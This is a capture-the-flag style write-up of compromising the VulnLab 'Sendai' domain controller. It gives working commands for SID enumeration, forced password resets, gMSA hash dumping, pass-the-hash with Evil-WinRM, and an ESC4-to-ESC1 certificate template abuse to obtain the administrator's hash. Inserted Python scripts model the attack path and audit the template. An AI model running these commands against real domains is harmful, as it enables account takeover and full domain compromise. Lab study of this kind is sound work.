Penetration Testing - Sendai - Vulnlab

Intro

The Sendai machine from VulnLab presents a complex and multifaceted challenge for penetration testers. This writeup explores the step-by-step process of enumerating services, exploiting vulnerabilities, and achieving privilege escalation on Sendai. Starting with a comprehensive Nmap scan, we identified multiple services including Microsoft IIS, Kerberos, and LDAP, which provided various entry points. Through meticulous SMB enumeration, we discovered and exfiltrated sensitive files, revealing user accounts and security weaknesses. By leveraging these findings, we exploited user credentials and abused Active Directory configurations to ultimately gain administrative access, showcasing a complete exploitation path from initial access to full system compromise.

Nmap Results

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 12:04 EEST
Nmap scan report for dc.sendai.vl (10.10.112.115)
Host is up (0.045s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-17 09:04:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after:  2024-07-18T00:00:00
|_http-title: IIS Windows Server
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2024-06-17T08:39:08
|_Not valid after:  2025-06-17T08:39:08
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-17T09:05:38+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-06-16T08:48:11
|_Not valid after:  2024-12-16T08:48:11
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-17T09:05:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.30 seconds
        


Web Server

The web server is running, but it serves only the default IIS installation page.



SMB Enumeration

Found the following shares:

The contents of the config share cannot be listed.

It is possible to connect to the "sendai" share as a guest:

Once inside the sendai share, I checked the transfer folder and found folders for the following users:

I will create a new file named "users.txt" with all the users I can collect from this server:

anthony.smith
clifford.davey
elliot.yates
susan.harper
thomas.powell        

Checking the remaining folders, I found the following files, which I copied to my machine:

guidelines.txt

This file seems to be a compliance file providing the compliance guidelines for this company.

incident.txt

Dear valued employees,

We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.

To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.

We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.

If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.

Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.            

According to the notice, users with insecure passwords are required to change them at their next login, so there is a good chance that some users have not changed their passwords yet.


Resetting user passwords

We now have a small list of users obtained from the SMB share. We can get more users with the Impacket tool "impacket-lookupsid", which brute-forces SIDs (walking the RID range over the LSARPC pipe) to enumerate domain users and groups.


└─$ impacket-lookupsid [email protected] 10000             
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at dc.sendai.vl
[*] StringBinding ncacn_np:dc.sendai.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132
498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SENDAI\Administrator (SidTypeUser)
501: SENDAI\Guest (SidTypeUser)
502: SENDAI\krbtgt (SidTypeUser)
512: SENDAI\Domain Admins (SidTypeGroup)
513: SENDAI\Domain Users (SidTypeGroup)
514: SENDAI\Domain Guests (SidTypeGroup)
515: SENDAI\Domain Computers (SidTypeGroup)
516: SENDAI\Domain Controllers (SidTypeGroup)
517: SENDAI\Cert Publishers (SidTypeAlias)
518: SENDAI\Schema Admins (SidTypeGroup)
519: SENDAI\Enterprise Admins (SidTypeGroup)
520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
525: SENDAI\Protected Users (SidTypeGroup)
526: SENDAI\Key Admins (SidTypeGroup)
527: SENDAI\Enterprise Key Admins (SidTypeGroup)
553: SENDAI\RAS and IAS Servers (SidTypeAlias)
571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
1000: SENDAI\DC$ (SidTypeUser)
1101: SENDAI\DnsAdmins (SidTypeAlias)
1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
1104: SENDAI\sqlsvc (SidTypeUser)
1105: SENDAI\websvc (SidTypeUser)
1107: SENDAI\staff (SidTypeGroup)
1108: SENDAI\Dorothy.Jones (SidTypeUser)
1109: SENDAI\Kerry.Robinson (SidTypeUser)
1110: SENDAI\Naomi.Gardner (SidTypeUser)
1111: SENDAI\Anthony.Smith (SidTypeUser)
1112: SENDAI\Susan.Harper (SidTypeUser)
1113: SENDAI\Stephen.Simpson (SidTypeUser)
1114: SENDAI\Marie.Gallagher (SidTypeUser)
1115: SENDAI\Kathleen.Kelly (SidTypeUser)
1116: SENDAI\Norman.Baxter (SidTypeUser)
1117: SENDAI\Jason.Brady (SidTypeUser)
1118: SENDAI\Elliot.Yates (SidTypeUser)
1119: SENDAI\Malcolm.Smith (SidTypeUser)
1120: SENDAI\Lisa.Williams (SidTypeUser)
1121: SENDAI\Ross.Sullivan (SidTypeUser)
1122: SENDAI\Clifford.Davey (SidTypeUser)
1123: SENDAI\Declan.Jenkins (SidTypeUser)
1124: SENDAI\Lawrence.Grant (SidTypeUser)
1125: SENDAI\Leslie.Johnson (SidTypeUser)
1126: SENDAI\Megan.Edwards (SidTypeUser)
1127: SENDAI\Thomas.Powell (SidTypeUser)
1128: SENDAI\ca-operators (SidTypeGroup)
1129: SENDAI\admsvc (SidTypeGroup)
1130: SENDAI\mgtsvc$ (SidTypeUser)
1131: SENDAI\support (SidTypeGroup)        

Let's add all those users to our users.txt file.

With those users in our file, we can check which accounts are flagged to reset their password. To do that we can use "CrackMapExec" or "NXC" (NetExec): an authentication attempt against such an account returns STATUS_PASSWORD_MUST_CHANGE.

After filtering the results, we can reset the password for the following users:

└─$ cat crackmapexec.txt| grep "PASSWORD_MUST_CHANGE"
SMB         10.10.112.115   445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.112.115   445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
                                                                                                                       

Let's change it for both users. I will use impacket-smbpasswd.


impacket-smbpasswd sendai.vl/[email protected] -newpass 'Password123!!!'


Checking if the password works:

./nxc smb 10.10.112.115 -u users2.txt -p 'Password123!!!' -d sendai.vl --continue-on-success


At this point I tried logging in over RDP, but it failed for both users.

Let's get more information about the environment with BloodHound.


BloodHound - Getting more information from AD and Finding an Attack Path.

If you do not have BloodHound installed, you can follow the guide here: https://github.com/SpecterOps/BloodHound

The data can be collected remotely with BloodHound.py:

python3


Once the data is ingested into BloodHound, I checked the user thomas.powell (the same applies to elliot.yates). The next graphic shows that Thomas Powell is a member of the Support group, and that this group has "GenericAll" permissions on the ADMSVC group.


The ADMSVC group has the following members:

The ADMSVC group also has ReadGMSAPassword on the account MGTSVC$.
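The chain BloodHound draws here (MemberOf, then GenericAll, then ReadGMSAPassword) is a shortest-path search over an edge list. As an added example that is not part of the original writeup or of BloodHound, the script below rebuilds that search on a constructed edge list mirroring the relationships described above (node names follow BloodHound's NAME@DOMAIN convention and are assumptions), and adds the reverse question a defender asks: which principals can reach MGTSVC$ at all.

```python
from collections import defaultdict, deque

# Constructed edge list reproducing the relationships the BloodHound graph showed.
# elliot.yates' membership mirrors the writeup's remark that the same path exists
# for that user; clifford.davey's membership is the CA-Operators edge seen later.
EDGES = [
    ("THOMAS.POWELL@SENDAI.VL", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("ELLIOT.YATES@SENDAI.VL", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("SUPPORT@SENDAI.VL", "GenericAll", "ADMSVC@SENDAI.VL"),
    ("ADMSVC@SENDAI.VL", "ReadGMSAPassword", "MGTSVC$@SENDAI.VL"),
    ("CLIFFORD.DAVEY@SENDAI.VL", "MemberOf", "CA-OPERATORS@SENDAI.VL"),
]


def build_graph(edges):
    """Adjacency list: node -> list of (edge_type, target)."""
    graph = defaultdict(list)
    for src, edge_type, dst in edges:
        graph[src].append((edge_type, dst))
    return graph


def find_path(graph, start, goal):
    """Breadth-first search; returns the shortest path as (src, edge, dst) steps, or None."""
    if start == goal:
        return []
    parent = {start: None}  # node -> (previous node, edge type used to reach it)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for edge_type, nxt in graph.get(node, []):
            if nxt in parent:
                continue
            parent[nxt] = (node, edge_type)
            if nxt == goal:
                steps, cur = [], goal
                while parent[cur] is not None:
                    prev, used = parent[cur]
                    steps.append((prev, used, cur))
                    cur = prev
                return steps[::-1]
            queue.append(nxt)
    return None


def who_can_reach(graph, target):
    """Every principal with some path to target (reverse BFS): the review list for a defender."""
    reverse = defaultdict(list)
    for src, outgoing in graph.items():
        for _edge_type, dst in outgoing:
            reverse[dst].append(src)
    seen, queue = set(), deque([target])
    while queue:
        node = queue.popleft()
        for prev in reverse.get(node, []):
            if prev not in seen:
                seen.add(prev)
                queue.append(prev)
    return seen


def describe(path):
    """Render a path as one line per hop, e.g. 'A -[MemberOf]-> B'."""
    return [f"{src} -[{edge}]-> {dst}" for src, edge, dst in path]


if __name__ == "__main__":
    graph = build_graph(EDGES)
    path = find_path(graph, "THOMAS.POWELL@SENDAI.VL", "MGTSVC$@SENDAI.VL")
    print("\n".join(describe(path)))
    print("principals that can reach MGTSVC$:", sorted(who_can_reach(graph, "MGTSVC$@SENDAI.VL")))
```

The reverse search is the useful part for remediation: it lists every group and user whose rights should be reviewed, not just the one path an attacker happened to take.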

We now have an attack path. Let's add Thomas to the ADMSVC group:


python3


The user is now part of the ADMSVC group. We can now dump the NTLM hash of the gMSA account MGTSVC$:

./nxc ldap 10.10.112.115 -u thomas.powell -p 'Password123!!!' --gmsa

Let's confirm it works:

./nxc smb 10.10.112.115 -u mgtsvc -H 57ae3a74ca9345ae52fadc29f178ad11


Logging into the machine

We will use Evil-WinRM:

evil-winrm -i 10.10.112.115 -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

Once logged in, since the account holds SeMachineAccountPrivilege, I attempted to run KrbRelayUp but had no success.

Ran PrivEscCheck.ps1:

It shows a cleartext password for user clifford.davey: RFmoB2WplgE_3p

Trying to log into the machine with this user did not work:

Abusing ADCS ESC4 vulnerability

Since it was not possible to log into the machine with this user, I went back to BloodHound and found the following:

He is a member of CA-Operators (Certificate Authority Operators), so this group probably has certificate enrollment rights.

Checking for vulnerabilities:

./certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.112.115 -stdout


This lists a template called SendaiComputer that is configured for client authentication, so a certificate issued from it can be used to authenticate to the domain. The ca-operators group has full control over this template, meaning it can be edited. Write access to a template lets us reconfigure it and then impersonate a domain admin; this is known as ESC4.

Let's abuse it. The following command converts the ESC4 condition into ESC1 by rewriting the template. ESC1 allows low-privileged users to enroll and request a certificate on behalf of any domain object they specify as the subject, so any user with enrollment rights can request a certificate for a privileged account such as a domain administrator.
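The conditions certipy is checking for ESC1 and ESC4 can be stated as a small audit rule set. As an added example (not from the writeup and not certipy's own code), the script below models the SendaiComputer template as described above, scores it before and after the template rewrite, and shows the hardened configuration that clears both findings. The flag bits and EKU OIDs are the documented AD CS values; the template dictionary, the principal names and the assumption that ENROLLEE_SUPPLIES_SUBJECT was not set before the edit (consistent with certipy reporting only ESC4) are mine.

```python
# Documented AD CS constants: msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits
# and the EKU OIDs that make a certificate usable for domain authentication.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester chooses subject / SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals expected to control templates; anything else counts as low-privileged.
PRIVILEGED = {"SENDAI.VL\\DOMAIN ADMINS", "SENDAI.VL\\ENTERPRISE ADMINS", "SENDAI.VL\\ADMINISTRATORS"}

# Constructed model of the SendaiComputer template as certipy described it:
# client-auth EKU, enrollable by ca-operators, fully controlled by ca-operators.
SENDAI_COMPUTER = {
    "name": "SendaiComputer",
    "enabled": True,
    "name_flag": 0,                 # assumption: subject supplied by the CA before the edit
    "enrollment_flag": 0,           # no manager approval
    "authorized_signatures": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["SENDAI.VL\\CA-OPERATORS"],
    "write": ["SENDAI.VL\\CA-OPERATORS"],  # holders of WriteDacl/WriteOwner/WriteProperty/GenericAll
}


def low_privileged(principals, privileged=PRIVILEGED):
    return [p for p in principals if p.upper() not in privileged]


def allows_client_auth(template):
    # An empty EKU list means the certificate is unrestricted, which covers authentication too.
    ekus = template["ekus"]
    return not ekus or any(eku in AUTH_EKUS for eku in ekus)


def is_esc1(t, privileged=PRIVILEGED):
    """Enabled, usable for auth, requester picks the subject, no approval gate, low-priv enroll."""
    return bool(
        t["enabled"]
        and allows_client_auth(t)
        and (t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        and not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS)
        and t["authorized_signatures"] == 0
        and low_privileged(t["enroll"], privileged)
    )


def is_esc4(t, privileged=PRIVILEGED):
    """A low-privileged principal can rewrite the template object itself."""
    return bool(low_privileged(t["write"], privileged))


def assess(t, privileged=PRIVILEGED):
    findings = []
    if is_esc1(t, privileged):
        findings.append("ESC1")
    if is_esc4(t, privileged):
        findings.append("ESC4")
    return findings


def simulate_template_edit(t):
    """What write access over the template allows: turning it into an ESC1 template."""
    edited = dict(t)
    edited["name_flag"] = t["name_flag"] | CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    edited["enrollment_flag"] = t["enrollment_flag"] & ~CT_FLAG_PEND_ALL_REQUESTS
    edited["authorized_signatures"] = 0
    return edited


def harden(t):
    """Remediation: restrict write access to administrators and keep the subject CA-supplied."""
    fixed = dict(t)
    fixed["write"] = ["SENDAI.VL\\DOMAIN ADMINS"]
    fixed["name_flag"] = t["name_flag"] & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed


if __name__ == "__main__":
    print("as found:  ", assess(SENDAI_COMPUTER))
    print("after edit:", assess(simulate_template_edit(SENDAI_COMPUTER)))
    print("hardened:  ", assess(harden(SENDAI_COMPUTER)))
```

The point the checks make explicit is that ESC4 is the root cause: as long as a non-administrative group can write the template, any of the other ESC conditions can be introduced at will, so the fix is the ACL on the template object rather than the individual flags. Enabling manager approval is a second, independent guard that suppresses ESC1 even when the subject flag is set.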

Let's do that:

./certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.83.157 -template SendaiComputer


This template is now ESC1 which means we can now request a certificate:

./certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.83.157 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator


Now that we have the certificate, we can authenticate with it and obtain the NTLM hash:

./certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sendai.vl' -dc-ip 10.10.83.157

Privilege Escalation

Now that we have the NTLM hash for the administrator, we can log into the machine with Evil-WinRM:

Now it is possible to get the flags.

C:\user.txt

C:\users\administrator\Desktop\flag.txt


Conclusions

The Sendai machine from VulnLab offered a rich learning experience, highlighting the importance of thorough enumeration and strategic exploitation. The journey from the initial Nmap scan to full system compromise demonstrated several key points:

  1. Enumeration is Crucial: The detailed Nmap scan provided valuable information about the services and potential vulnerabilities on the target machine. This foundational step set the stage for all subsequent actions.
  2. SMB Enumeration and User Discovery: By carefully examining SMB shares, we were able to uncover sensitive information and user accounts. This step was pivotal in progressing through the exploitation phase.
  3. Credential Exploitation: Utilizing discovered user credentials allowed us to gain a foothold within the network. The ability to escalate privileges through password resets and leveraging AD group memberships was instrumental in advancing our access level.
  4. Active Directory Misconfigurations: The abuse of Active Directory misconfigurations, such as exploiting group memberships and certificate services, underscored the significance of proper AD security practices. These misconfigurations provided direct pathways to elevate privileges and gain administrative control.
  5. Persistence and Privilege Escalation: Privilege escalation techniques, including the use of tools like BloodHound and Impacket, were crucial in maintaining access and moving laterally within the network.

In conclusion, the Sendai machine serves as an excellent real-life case study demonstrating a holistic approach to penetration testing or red teaming. It reinforces the value of methodical enumeration, creative exploitation, and strategic use of tools to uncover and exploit system weaknesses. Through this exercise, we have highlighted both the importance of robust security practices and the effectiveness of offensive security methodologies in identifying vulnerabilities.
